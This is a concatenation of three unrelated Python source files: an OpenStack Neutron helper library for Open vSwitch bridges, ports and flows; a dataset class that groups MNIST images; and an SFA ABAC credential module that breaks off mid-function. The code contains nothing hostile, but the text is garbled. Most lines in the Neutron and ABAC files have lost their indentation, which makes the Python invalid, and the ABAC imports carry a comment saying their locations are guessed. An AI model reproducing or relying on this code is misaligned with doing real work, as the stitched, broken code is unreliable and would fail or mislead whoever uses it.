# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import operator
from oslo.config import cfg
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import exceptions
from neutron.openstack.common import excutils
from neutron.openstack.common.gettextutils import _LI, _LW
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
# Default timeout for ovs-vsctl command
DEFAULT_OVS_VSCTL_TIMEOUT = 10
# Special return value for an invalid OVS ofport
INVALID_OFPORT = '-1'
OPTS = [
cfg.IntOpt('ovs_vsctl_timeout',
default=DEFAULT_OVS_VSCTL_TIMEOUT,
help=_('Timeout in seconds for ovs-vsctl commands')),
]
cfg.CONF.register_opts(OPTS)
LOG = logging.getLogger(__name__)
class VifPort:
def __init__(self, port_name, ofport, vif_id, vif_mac, switch):
self.port_name = port_name
self.ofport = ofport
self.vif_id = vif_id
self.vif_mac = vif_mac
self.switch = switch
def __str__(self):
return ("iface-id=" + self.vif_id + ", vif_mac=" +
self.vif_mac + ", port_name=" + self.port_name +
", ofport=" + str(self.ofport) + ", bridge_name=" +
self.switch.br_name)
class BaseOVS(object):
def __init__(self, root_helper):
self.root_helper = root_helper
self.vsctl_timeout = cfg.CONF.ovs_vsctl_timeout
def run_vsctl(self, args, check_error=False):
full_args = ["ovs-vsctl", "--timeout=%d" % self.vsctl_timeout] + args
try:
return utils.execute(full_args, root_helper=self.root_helper)
except Exception as e:
with excutils.save_and_reraise_exception() as ctxt:
LOG.error(_("Unable to execute %(cmd)s. "
"Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
if not check_error:
ctxt.reraise = False
def add_bridge(self, bridge_name):
self.run_vsctl(["--", "--may-exist", "add-br", bridge_name])
return OVSBridge(bridge_name, self.root_helper)
def delete_bridge(self, bridge_name):
self.run_vsctl(["--", "--if-exists", "del-br", bridge_name])
def bridge_exists(self, bridge_name):
try:
self.run_vsctl(['br-exists', bridge_name], check_error=True)
except RuntimeError as e:
with excutils.save_and_reraise_exception() as ctxt:
if 'Exit code: 2\n' in str(e):
ctxt.reraise = False
return False
return True
def get_bridge_name_for_port_name(self, port_name):
try:
return self.run_vsctl(['port-to-br', port_name], check_error=True)
except RuntimeError as e:
with excutils.save_and_reraise_exception() as ctxt:
if 'Exit code: 1\n' in str(e):
ctxt.reraise = False
def port_exists(self, port_name):
return bool(self.get_bridge_name_for_port_name(port_name))
class OVSBridge(BaseOVS):
def __init__(self, br_name, root_helper):
super(OVSBridge, self).__init__(root_helper)
self.br_name = br_name
def set_controller(self, controller_names):
vsctl_command = ['--', 'set-controller', self.br_name]
vsctl_command.extend(controller_names)
self.run_vsctl(vsctl_command, check_error=True)
def del_controller(self):
self.run_vsctl(['--', 'del-controller', self.br_name],
check_error=True)
def get_controller(self):
res = self.run_vsctl(['--', 'get-controller', self.br_name],
check_error=True)
if res:
return res.strip().split('\n')
return res
def set_secure_mode(self):
self.run_vsctl(['--', 'set-fail-mode', self.br_name, 'secure'],
check_error=True)
def set_protocols(self, protocols):
self.run_vsctl(['--', 'set', 'bridge', self.br_name,
"protocols=%s" % protocols],
check_error=True)
def create(self):
self.add_bridge(self.br_name)
def destroy(self):
self.delete_bridge(self.br_name)
def reset_bridge(self):
self.destroy()
self.create()
def add_port(self, port_name):
self.run_vsctl(["--", "--may-exist", "add-port", self.br_name,
port_name])
return self.get_port_ofport(port_name)
def delete_port(self, port_name):
self.run_vsctl(["--", "--if-exists", "del-port", self.br_name,
port_name])
def set_db_attribute(self, table_name, record, column, value):
args = ["set", table_name, record, "%s=%s" % (column, value)]
self.run_vsctl(args)
def clear_db_attribute(self, table_name, record, column):
args = ["clear", table_name, record, column]
self.run_vsctl(args)
def run_ofctl(self, cmd, args, process_input=None):
full_args = ["ovs-ofctl", cmd, self.br_name] + args
try:
return utils.execute(full_args, root_helper=self.root_helper,
process_input=process_input)
except Exception as e:
LOG.error(_("Unable to execute %(cmd)s. Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
def count_flows(self):
flow_list = self.run_ofctl("dump-flows", []).split("\n")[1:]
return len(flow_list) - 1
def remove_all_flows(self):
self.run_ofctl("del-flows", [])
def get_port_ofport(self, port_name):
ofport = self.db_get_val("Interface", port_name, "ofport")
# This can return a non-integer string, like '[]' so ensure a
# common failure case
try:
int(ofport)
return ofport
except (ValueError, TypeError):
return INVALID_OFPORT
def get_datapath_id(self):
return self.db_get_val('Bridge',
self.br_name, 'datapath_id').strip('"')
def do_action_flows(self, action, kwargs_list):
flow_strs = [_build_flow_expr_str(kw, action) for kw in kwargs_list]
self.run_ofctl('%s-flows' % action, ['-'], '\n'.join(flow_strs))
def add_flow(self, **kwargs):
self.do_action_flows('add', [kwargs])
def mod_flow(self, **kwargs):
self.do_action_flows('mod', [kwargs])
def delete_flows(self, **kwargs):
self.do_action_flows('del', [kwargs])
def dump_flows_for_table(self, table):
retval = None
flow_str = "table=%s" % table
flows = self.run_ofctl("dump-flows", [flow_str])
if flows:
retval = '\n'.join(item for item in flows.splitlines()
if 'NXST' not in item)
return retval
def deferred(self, **kwargs):
return DeferredOVSBridge(self, **kwargs)
def add_tunnel_port(self, port_name, remote_ip, local_ip,
tunnel_type=constants.TYPE_GRE,
vxlan_udp_port=constants.VXLAN_UDP_PORT,
dont_fragment=True):
vsctl_command = ["--", "--may-exist", "add-port", self.br_name,
port_name]
vsctl_command.extend(["--", "set", "Interface", port_name,
"type=%s" % tunnel_type])
if tunnel_type == constants.TYPE_VXLAN:
# Only set the VXLAN UDP port if it's not the default
if vxlan_udp_port != constants.VXLAN_UDP_PORT:
vsctl_command.append("options:dst_port=%s" % vxlan_udp_port)
vsctl_command.append(("options:df_default=%s" %
bool(dont_fragment)).lower())
vsctl_command.extend(["options:remote_ip=%s" % remote_ip,
"options:local_ip=%s" % local_ip,
"options:in_key=flow",
"options:out_key=flow"])
self.run_vsctl(vsctl_command)
ofport = self.get_port_ofport(port_name)
if (tunnel_type == constants.TYPE_VXLAN and
ofport == INVALID_OFPORT):
LOG.error(_('Unable to create VXLAN tunnel port. Please ensure '
'that an openvswitch version that supports VXLAN is '
'installed.'))
return ofport
def add_patch_port(self, local_name, remote_name):
self.run_vsctl(["add-port", self.br_name, local_name,
"--", "set", "Interface", local_name,
"type=patch", "options:peer=%s" % remote_name])
return self.get_port_ofport(local_name)
def db_get_map(self, table, record, column, check_error=False):
output = self.run_vsctl(["get", table, record, column], check_error)
if output:
output_str = output.rstrip("\n\r")
return self.db_str_to_map(output_str)
return {}
def db_get_val(self, table, record, column, check_error=False):
output = self.run_vsctl(["get", table, record, column], check_error)
if output:
return output.rstrip("\n\r")
def db_str_to_map(self, full_str):
        elements = full_str.strip("{}").split(", ")
        ret = {}
        for e in elements:
if e.find("=") == -1:
continue
arr = e.split("=")
ret[arr[0]] = arr[1].strip("\"")
return ret
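    # Example (illustrative values): ovs-vsctl prints OVSDB maps as
    # '{csum="true", remote_ip="192.168.1.1"}', which db_str_to_map() turns
    # into {'csum': 'true', 'remote_ip': '192.168.1.1'}. Values containing
    # '=' or ', ' are not handled by this simple splitter.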
def get_port_name_list(self):
res = self.run_vsctl(["list-ports", self.br_name], check_error=True)
if res:
return res.strip().split("\n")
return []
def get_port_stats(self, port_name):
return self.db_get_map("Interface", port_name, "statistics")
def get_xapi_iface_id(self, xs_vif_uuid):
args = ["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=%s" % xs_vif_uuid]
try:
return utils.execute(args, root_helper=self.root_helper).strip()
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Unable to execute %(cmd)s. "
"Exception: %(exception)s"),
{'cmd': args, 'exception': e})
# returns a VIF object for each VIF port
def get_vif_ports(self):
edge_ports = []
port_names = self.get_port_name_list()
for name in port_names:
external_ids = self.db_get_map("Interface", name, "external_ids",
check_error=True)
ofport = self.db_get_val("Interface", name, "ofport",
check_error=True)
if "iface-id" in external_ids and "attached-mac" in external_ids:
p = VifPort(name, ofport, external_ids["iface-id"],
external_ids["attached-mac"], self)
edge_ports.append(p)
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not automatically
# synced to OVS from XAPI, we grab it from XAPI directly
iface_id = self.get_xapi_iface_id(external_ids["xs-vif-uuid"])
p = VifPort(name, ofport, iface_id,
external_ids["attached-mac"], self)
edge_ports.append(p)
return edge_ports
def get_vif_port_set(self):
port_names = self.get_port_name_list()
edge_ports = set()
args = ['--format=json', '--', '--columns=name,external_ids,ofport',
'list', 'Interface']
result = self.run_vsctl(args, check_error=True)
if not result:
return edge_ports
for row in jsonutils.loads(result)['data']:
name = row[0]
if name not in port_names:
continue
external_ids = dict(row[1][1])
# Do not consider VIFs which aren't yet ready
# This can happen when ofport values are either [] or ["set", []]
# We will therefore consider only integer values for ofport
ofport = row[2]
try:
int_ofport = int(ofport)
except (ValueError, TypeError):
LOG.warn(_("Found not yet ready openvswitch port: %s"), row)
else:
if int_ofport > 0:
if ("iface-id" in external_ids and
"attached-mac" in external_ids):
edge_ports.add(external_ids['iface-id'])
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not
# automatically synced to OVS from XAPI, we grab it
# from XAPI directly
iface_id = self.get_xapi_iface_id(
external_ids["xs-vif-uuid"])
edge_ports.add(iface_id)
else:
LOG.warn(_("Found failed openvswitch port: %s"), row)
return edge_ports
def get_port_tag_dict(self):
"""Get a dict of port names and associated vlan tags.
e.g. the returned dict is of the following form::
{u'int-br-eth2': [],
u'patch-tun': [],
u'qr-76d9e6b6-21': 1,
u'tapce5318ff-78': 1,
u'tape1400310-e6': 1}
The TAG ID is only available in the "Port" table and is not available
in the "Interface" table queried by the get_vif_port_set() method.
"""
port_names = self.get_port_name_list()
args = ['--format=json', '--', '--columns=name,tag', 'list', 'Port']
result = self.run_vsctl(args, check_error=True)
port_tag_dict = {}
if not result:
return port_tag_dict
for name, tag in jsonutils.loads(result)['data']:
if name not in port_names:
continue
# 'tag' can be [u'set', []] or an integer
if isinstance(tag, list):
tag = tag[1]
port_tag_dict[name] = tag
return port_tag_dict
def get_vif_port_by_id(self, port_id):
args = ['--format=json', '--', '--columns=external_ids,name,ofport',
'find', 'Interface',
'external_ids:iface-id="%s"' % port_id]
result = self.run_vsctl(args)
if not result:
return
json_result = jsonutils.loads(result)
try:
# Retrieve the indexes of the columns we're looking for
headings = json_result['headings']
ext_ids_idx = headings.index('external_ids')
name_idx = headings.index('name')
ofport_idx = headings.index('ofport')
# If data attribute is missing or empty the line below will raise
            # an exception which will be captured in this block.
# We won't deal with the possibility of ovs-vsctl return multiple
# rows since the interface identifier is unique
for data in json_result['data']:
port_name = data[name_idx]
switch = get_bridge_for_iface(self.root_helper, port_name)
if switch != self.br_name:
continue
ofport = data[ofport_idx]
# ofport must be integer otherwise return None
if not isinstance(ofport, int) or ofport == -1:
LOG.warn(_LW("ofport: %(ofport)s for VIF: %(vif)s is not a"
" positive integer"), {'ofport': ofport,
'vif': port_id})
return
# Find VIF's mac address in external ids
ext_id_dict = dict((item[0], item[1]) for item in
data[ext_ids_idx][1])
vif_mac = ext_id_dict['attached-mac']
return VifPort(port_name, ofport, port_id, vif_mac, self)
LOG.info(_LI("Port %(port_id)s not present in bridge %(br_name)s"),
{'port_id': port_id, 'br_name': self.br_name})
except Exception as error:
LOG.warn(_LW("Unable to parse interface details. Exception: %s"),
error)
return
def delete_ports(self, all_ports=False):
if all_ports:
port_names = self.get_port_name_list()
else:
port_names = (port.port_name for port in self.get_vif_ports())
for port_name in port_names:
self.delete_port(port_name)
def get_local_port_mac(self):
"""Retrieve the mac of the bridge's local port."""
address = ip_lib.IPDevice(self.br_name, self.root_helper).link.address
if address:
return address
else:
msg = _('Unable to determine mac address for %s') % self.br_name
raise Exception(msg)
def __enter__(self):
self.create()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.destroy()
class DeferredOVSBridge(object):
'''Deferred OVSBridge.
This class wraps add_flow, mod_flow and delete_flows calls to an OVSBridge
and defers their application until apply_flows call in order to perform
bulk calls. It wraps also ALLOWED_PASSTHROUGHS calls to avoid mixing
OVSBridge and DeferredOVSBridge uses.
This class can be used as a context, in such case apply_flows is called on
__exit__ except if an exception is raised.
    This class is not thread-safe, which is why a new instance must be
    created for every use.
'''
ALLOWED_PASSTHROUGHS = 'add_port', 'add_tunnel_port', 'delete_port'
def __init__(self, br, full_ordered=False,
order=('add', 'mod', 'del')):
'''Constructor.
:param br: wrapped bridge
:param full_ordered: Optional, disable flow reordering (slower)
        :param order: Optional, define in which order flows are applied
'''
self.br = br
self.full_ordered = full_ordered
self.order = order
if not self.full_ordered:
self.weights = dict((y, x) for x, y in enumerate(self.order))
self.action_flow_tuples = []
def __getattr__(self, name):
if name in self.ALLOWED_PASSTHROUGHS:
return getattr(self.br, name)
raise AttributeError(name)
def add_flow(self, **kwargs):
self.action_flow_tuples.append(('add', kwargs))
def mod_flow(self, **kwargs):
self.action_flow_tuples.append(('mod', kwargs))
def delete_flows(self, **kwargs):
self.action_flow_tuples.append(('del', kwargs))
def apply_flows(self):
action_flow_tuples = self.action_flow_tuples
self.action_flow_tuples = []
if not action_flow_tuples:
return
if not self.full_ordered:
action_flow_tuples.sort(key=lambda af: self.weights[af[0]])
grouped = itertools.groupby(action_flow_tuples,
key=operator.itemgetter(0))
itemgetter_1 = operator.itemgetter(1)
for action, action_flow_list in grouped:
flows = map(itemgetter_1, action_flow_list)
self.br.do_action_flows(action, flows)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is None:
self.apply_flows()
else:
LOG.exception(_("OVS flows could not be applied on bridge %s"),
self.br.br_name)
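# Usage sketch (illustrative only; the bridge name, root helper and flow
# arguments are hypothetical): DeferredOVSBridge batches flow edits and sends
# them to ovs-ofctl with one call per action type when the context exits
# cleanly.
#
#     br = OVSBridge('br-int', root_helper='sudo')
#     with br.deferred(full_ordered=False) as deferred_br:
#         deferred_br.add_flow(priority=2, dl_src='00:11:22:33:44:55',
#                              actions='normal')
#         deferred_br.delete_flows(dl_src='66:77:88:99:aa:bb')
#     # apply_flows() is invoked automatically by __exit__ on success.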
def get_bridge_for_iface(root_helper, iface):
args = ["ovs-vsctl", "--timeout=%d" % cfg.CONF.ovs_vsctl_timeout,
"iface-to-br", iface]
try:
return utils.execute(args, root_helper=root_helper).strip()
except Exception:
LOG.exception(_("Interface %s not found."), iface)
return None
def get_bridges(root_helper):
args = ["ovs-vsctl", "--timeout=%d" % cfg.CONF.ovs_vsctl_timeout,
"list-br"]
try:
return utils.execute(args, root_helper=root_helper).strip().split("\n")
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.exception(_("Unable to retrieve bridges. Exception: %s"), e)
def get_bridge_external_bridge_id(root_helper, bridge):
args = ["ovs-vsctl", "--timeout=2", "br-get-external-id",
bridge, "bridge-id"]
try:
return utils.execute(args, root_helper=root_helper).strip()
except Exception:
LOG.exception(_("Bridge %s not found."), bridge)
return None
def _build_flow_expr_str(flow_dict, cmd):
flow_expr_arr = []
actions = None
if cmd == 'add':
flow_expr_arr.append("hard_timeout=%s" %
flow_dict.pop('hard_timeout', '0'))
flow_expr_arr.append("idle_timeout=%s" %
flow_dict.pop('idle_timeout', '0'))
flow_expr_arr.append("priority=%s" %
flow_dict.pop('priority', '1'))
elif 'priority' in flow_dict:
msg = _("Cannot match priority on flow deletion or modification")
raise exceptions.InvalidInput(error_message=msg)
if cmd != 'del':
if "actions" not in flow_dict:
msg = _("Must specify one or more actions on flow addition"
" or modification")
raise exceptions.InvalidInput(error_message=msg)
actions = "actions=%s" % flow_dict.pop('actions')
for key, value in flow_dict.iteritems():
if key == 'proto':
flow_expr_arr.append(value)
else:
flow_expr_arr.append("%s=%s" % (key, str(value)))
if actions:
flow_expr_arr.append(actions)
return ','.join(flow_expr_arr)
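# Worked example (illustrative values): for the 'add' command,
# _build_flow_expr_str({'priority': 10, 'in_port': 1, 'actions': 'drop'}, 'add')
# yields 'hard_timeout=0,idle_timeout=0,priority=10,in_port=1,actions=drop';
# remaining match fields follow dict iteration order and 'actions' is always
# appended last.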
|
|
"""This module provides provides a dataset for the extension of RAM."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .DummyDataset import DummyDataset
from .IndexGenerator import IndexGenerator
import itertools
import numpy as np
class GroupDataset(object):
"""The Dataset class where each sample holds MNIST samples in a group."""
def __init__(
self, index_generator, dataset, noise_label_index,
data_label_index, amount_of_classes,
noises_per_class, n_samples, sample_size, one_hot=False
):
"""Construct a new Index Generator.
Args:
index_generator(IndexGenerator): index generator
dataset(object): accept the dataset (MNIST)
pythonic way: dataset should have properties:
`images` and `labels`
noise_label_index(list): noise label is expected at this index.
All other indexes will be considered as places where actual
                information comes from. One either specifies `noise_label_index`
or `data_label_index`. These properties are mutually exclusive.
data_label_index(list): data label is expected at this index.
Indexes of labels where relevant for the task
information comes from.
amount_of_classes(int): amount of classes the dataset should have
            noises_per_class(list): amount of noise labels per sample that
                each of the classes should have. Should be an array of size
                `amount_of_classes`. This condition should be fulfilled:
                all(
                    sample_size >= noise_n for noise_n in noises_per_class
                )
            n_samples(int): amount of samples in each of the classes.
                Should be an array of size `amount_of_classes` or an integer
                if the amount is the same across all classes.
sample_size(int): amount of pictures in one
sample(i.e. size of group).
one_hot(Boolean): if True then labels will be one hot encoded,
otherwise not.
"""
if(not(hasattr(dataset, "labels") and hasattr(dataset, "images"))):
raise ValueError(
'dataset object should have properties: `images` and `labels`'
)
if(not isinstance(index_generator, IndexGenerator)):
raise ValueError(
'index_generator should be an instance of IndexGenerator class'
)
if(
len(set(noise_label_index)) != len(noise_label_index) or
max(noise_label_index) >= amount_of_classes
):
            raise ValueError(
                'noise_label_index should not contain duplicates and all '
                'noise indexes must be smaller than amount_of_classes'
            )
if(max(noises_per_class) > sample_size):
            raise ValueError(
                'entries of noises_per_class should not exceed the sample '
                'size (sample_size)'
            )
        if(
            not isinstance(n_samples, int) and
            len(n_samples) != amount_of_classes
        ):
raise ValueError(
'n_samples should either be an int or fullfil \
len(n_samples) == amount_of_classes'
)
if(isinstance(n_samples, int)):
self.n_samples_per_class = (
[n_samples] * amount_of_classes
)
else:
self.n_samples_per_class = n_samples
self.__dataset = dataset
self.index_generator = index_generator
self.one_hot = one_hot
self.noise_label_index = noise_label_index
self.data_label_index = data_label_index
self.amount_of_classes = amount_of_classes
self.noises_per_class = noises_per_class
self.sample_size = sample_size
self._divide_dataset()
self._build_groups()
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def epochs_completed(self):
"""Return amount of epoch completed of the dataset."""
return self._epochs_completed
@property
def images(self):
"""Return the images of the dataset."""
return self._images
@property
def labels(self):
"""Return the labels of the dataset."""
return self._labels
def _divide_dataset(self):
# we need to extract two dataset from one which comes from
# constructor. These properites should be something like
# noise_data ; .labels, .images
# information_dataset ; .labels, .images
self.__noise_data = DummyDataset()
self.__information_data = DummyDataset()
for image, label in zip(self.__dataset.images, self.__dataset.labels):
if(np.argmax(label) in self.noise_label_index):
self.__noise_data.add_sample(image, label)
if(np.argmax(label) in self.data_label_index):
self.__information_data.add_sample(image, label)
def _build_groups(self):
self._images = []
self._labels = []
for i in range(self.amount_of_classes):
self._build_group_for_class(i)
self._images = np.array(self._images)
self._labels = np.array(self._labels)
self.num_examples = self._labels.shape[0]
self.permute()
def _build_group_for_class(self, class_number):
n_samples = self.n_samples_per_class[class_number]
class_label = self._build_label_for_class(class_number)
noise_comb, data_comb = self._build_combinations(class_number)
for i in range(n_samples):
group = []
try:
combination_noise_i = next(noise_comb)
combinations_data_i = next(data_comb)
except StopIteration:
noise_comb, data_comb = self._build_combinations_and_permute(
class_number
)
combination_noise_i = next(noise_comb)
combinations_data_i = next(data_comb)
noise_images, noise_labels = self.__noise_data.get(
combination_noise_i
)
info_images, info_labels = self.__information_data.get(
combinations_data_i
)
noise_indexes = self.index_generator.get_indexes_for_class(
class_number
)[0]
for j in range(self.sample_size):
if(j in noise_indexes):
group.append(noise_images.pop())
if(j not in noise_indexes):
group.append(info_images.pop())
self._images.append(group)
self._labels.append(class_label)
def _permute_datasets(self):
self.__noise_data.permute()
self.__information_data.permute()
def _build_label_for_class(self, cls_n):
if(self.one_hot):
class_label = np.zeros((1, self.amount_of_classes))
class_label[np.arange(1), [cls_n]] = 1
else:
class_label = cls_n
return class_label
def _build_combinations(self, cls_n):
n_noise_per_class = self.noises_per_class[cls_n]
n_data_per_class = self.sample_size - n_noise_per_class
        noise_combination_indices = itertools.combinations(
            range(self.__noise_data.length), n_noise_per_class
        )
        data_combination_indices = itertools.combinations(
            range(self.__information_data.length), n_data_per_class
        )
        return noise_combination_indices, data_combination_indices
def _build_combinations_and_permute(self, cls_n):
self._permute_datasets()
return self._build_combinations(cls_n)
def next_batch(self, batch_size):
"""Get next batch of size `batch_size`."""
start = self._index_in_epoch
if start + batch_size > self.num_examples:
self._epochs_completed += 1
rest_num_examples = self.num_examples - start
images_rest_part = self._images[start:self.num_examples]
labels_rest_part = self._labels[start:self.num_examples]
self.permute()
start = 0
self._index_in_epoch = batch_size - rest_num_examples
end = self._index_in_epoch
images_new_part = self._images[start:end]
labels_new_part = self._labels[start:end]
result_images = np.concatenate(
(images_rest_part, images_new_part), axis=0
)
result_labels = np.concatenate(
(labels_rest_part, labels_new_part), axis=0
)
return result_images, result_labels
else:
self._index_in_epoch += batch_size
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def permute(self):
"""Permute the dataset."""
perm0 = np.arange(self.num_examples)
np.random.shuffle(perm0)
self._images = self._images[perm0]
self._labels = self._labels[perm0]
return self
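# Usage sketch (illustrative only; `mnist` and the IndexGenerator arguments
# are hypothetical and depend on how this project configures them):
#
#     index_gen = IndexGenerator(...)          # project-specific setup
#     dataset = GroupDataset(
#         index_generator=index_gen, dataset=mnist,
#         noise_label_index=[0], data_label_index=[1, 2, 3],
#         amount_of_classes=2, noises_per_class=[1, 2],
#         n_samples=100, sample_size=4, one_hot=True)
#     images, labels = dataset.next_batch(32)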
|
|
#----------------------------------------------------------------------
# Copyright (c) 2014 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
from sfa.trust.credential import Credential, append_sub, DEFAULT_CREDENTIAL_LIFETIME
from sfa.util.sfalogging import logger
from sfa.util.sfatime import SFATIME_FORMAT
import datetime
# NOTE: the next two imports are assumed source locations for names used
# below (tz.tzutc() in encode() and CredentialNotVerifiable in decode()).
from dateutil import tz
from sfa.util.faults import CredentialNotVerifiable
from StringIO import StringIO
from xml.dom.minidom import Document, parseString
HAVELXML = False
try:
from lxml import etree
HAVELXML = True
except:
pass
# This module defines a subtype of sfa.trust.credential.Credential
# called an ABACCredential. An ABAC credential is a signed statement
# asserting a role representing the relationship between a subject and target
# or between a subject and a class of targets (all those satisfying a role).
#
# An ABAC credential is like a normal SFA credential in that it has
# a validated signature block and is checked for expiration.
# It does not, however, have 'privileges'. Rather it contains a 'head' and
# list of 'tails' of elements, each of which represents a principal and
# role.
# A special case of an ABAC credential is a speaks_for credential. Such
# a credential is simply an ABAC credential in form, but has a single
# tail and fixed role 'speaks_for'. In ABAC notation, it asserts
# AGENT.speaks_for(AGENT)<-CLIENT, or "AGENT asserts that CLIENT may speak
# for AGENT". The AGENT in this case is the head and the CLIENT is the
# tail and 'speaks_for_AGENT' is the role on the head. These speaks-for
# Credentials are used to allow a tool to 'speak as' itself but be recognized
# as speaking for an individual and be authorized to the rights of that
# individual and not to the rights of the tool itself.
# For more detail on the semantics and syntax and expected usage patterns
# of ABAC credentials, see http://groups.geni.net/geni/wiki/TIEDABACCredential.
# An ABAC element contains a principal (keyid and optional mnemonic)
# and optional role and linking_role element
class ABACElement:
def __init__(self, principal_keyid, principal_mnemonic=None, \
role=None, linking_role=None):
self._principal_keyid = principal_keyid
self._principal_mnemonic = principal_mnemonic
self._role = role
self._linking_role = linking_role
def get_principal_keyid(self): return self._principal_keyid
def get_principal_mnemonic(self): return self._principal_mnemonic
def get_role(self): return self._role
def get_linking_role(self): return self._linking_role
def __str__(self):
ret = self._principal_keyid
if self._principal_mnemonic:
ret = "%s (%s)" % (self._principal_mnemonic, self._principal_keyid)
if self._linking_role:
ret += ".%s" % self._linking_role
if self._role:
ret += ".%s" % self._role
return ret
# Subclass of Credential for handling ABAC credentials
# They have a different cred_type (geni_abac vs. geni_sfa)
# and they have a head and tail and role (as opposed to privileges)
class ABACCredential(Credential):
ABAC_CREDENTIAL_TYPE = 'geni_abac'
def __init__(self, create=False, subject=None,
string=None, filename=None):
self.head = None # An ABACElemenet
self.tails = [] # List of ABACElements
super(ABACCredential, self).__init__(create=create,
subject=subject,
string=string,
filename=filename)
self.cred_type = ABACCredential.ABAC_CREDENTIAL_TYPE
def get_head(self) :
if not self.head:
self.decode()
return self.head
def get_tails(self) :
if len(self.tails) == 0:
self.decode()
return self.tails
def decode(self):
super(ABACCredential, self).decode()
# Pull out the ABAC-specific info
doc = parseString(self.xml)
rt0s = doc.getElementsByTagName('rt0')
if len(rt0s) != 1:
raise CredentialNotVerifiable("ABAC credential had no rt0 element")
rt0_root = rt0s[0]
heads = self._get_abac_elements(rt0_root, 'head')
if len(heads) != 1:
raise CredentialNotVerifiable("ABAC credential should have exactly 1 head element, had %d" % len(heads))
self.head = heads[0]
self.tails = self._get_abac_elements(rt0_root, 'tail')
def _get_abac_elements(self, root, label):
abac_elements = []
elements = root.getElementsByTagName(label)
for elt in elements:
keyids = elt.getElementsByTagName('keyid')
if len(keyids) != 1:
raise CredentialNotVerifiable("ABAC credential element '%s' should have exactly 1 keyid, had %d." % (label, len(keyids)))
keyid_elt = keyids[0]
keyid = keyid_elt.childNodes[0].nodeValue.strip()
mnemonic = None
mnemonic_elts = elt.getElementsByTagName('mnemonic')
if len(mnemonic_elts) > 0:
mnemonic = mnemonic_elts[0].childNodes[0].nodeValue.strip()
role = None
role_elts = elt.getElementsByTagName('role')
if len(role_elts) > 0:
role = role_elts[0].childNodes[0].nodeValue.strip()
linking_role = None
linking_role_elts = elt.getElementsByTagName('linking_role')
if len(linking_role_elts) > 0:
linking_role = linking_role_elts[0].childNodes[0].nodeValue.strip()
abac_element = ABACElement(keyid, mnemonic, role, linking_role)
abac_elements.append(abac_element)
return abac_elements
def dump_string(self, dump_parents=False, show_xml=False):
result = "ABAC Credential\n"
filename=self.get_filename()
if filename: result += "Filename %s\n"%filename
if self.expiration:
result += "\texpiration: %s \n" % self.expiration.strftime(SFATIME_FORMAT)
result += "\tHead: %s\n" % self.get_head()
for tail in self.get_tails():
result += "\tTail: %s\n" % tail
if self.get_signature():
result += " gidIssuer:\n"
result += self.get_signature().get_issuer_gid().dump_string(8, dump_parents)
if show_xml and HAVELXML:
try:
tree = etree.parse(StringIO(self.xml))
aside = etree.tostring(tree, pretty_print=True)
result += "\nXML:\n\n"
result += aside
result += "\nEnd XML\n"
except:
import traceback
print "exc. Credential.dump_string / XML"
traceback.print_exc()
return result
# sounds like this should be __repr__ instead ??
# Produce the ABAC assertion. Something like [ABAC cred: Me.role<-You] or similar
def pretty_cred(self):
result = "[ABAC cred: " + str(self.get_head())
for tail in self.get_tails():
result += "<-%s" % str(tail)
result += "]"
return result
def createABACElement(self, doc, tagName, abacObj):
kid = abacObj.get_principal_keyid()
mnem = abacObj.get_principal_mnemonic() # may be None
role = abacObj.get_role() # may be None
link = abacObj.get_linking_role() # may be None
ele = doc.createElement(tagName)
prin = doc.createElement('ABACprincipal')
ele.appendChild(prin)
append_sub(doc, prin, "keyid", kid)
if mnem:
append_sub(doc, prin, "mnemonic", mnem)
if role:
append_sub(doc, ele, "role", role)
if link:
append_sub(doc, ele, "linking_role", link)
return ele
##
# Encode the attributes of the credential into an XML string
# This should be done immediately before signing the credential.
# WARNING:
# In general, a signed credential obtained externally should
# not be changed else the signature is no longer valid. So, once
# you have loaded an existing signed credential, do not call encode() or sign() on it.
def encode(self):
# Create the XML document
doc = Document()
signed_cred = doc.createElement("signed-credential")
# Declare namespaces
# Note that credential/policy.xsd are really the PG schemas
# in a PL namespace.
# Note that delegation of credentials between the 2 only really works
# cause those schemas are identical.
# Also note these PG schemas talk about PG tickets and CM policies.
signed_cred.setAttribute("xmlns:xsi", "http://www.w3.org/2001/XMLSchema-instance")
signed_cred.setAttribute("xsi:noNamespaceSchemaLocation", "http://www.geni.net/resources/credential/2/credential.xsd")
signed_cred.setAttribute("xsi:schemaLocation", "http://www.planet-lab.org/resources/sfa/ext/policy/1 http://www.planet-lab.org/resources/sfa/ext/policy/1/policy.xsd")
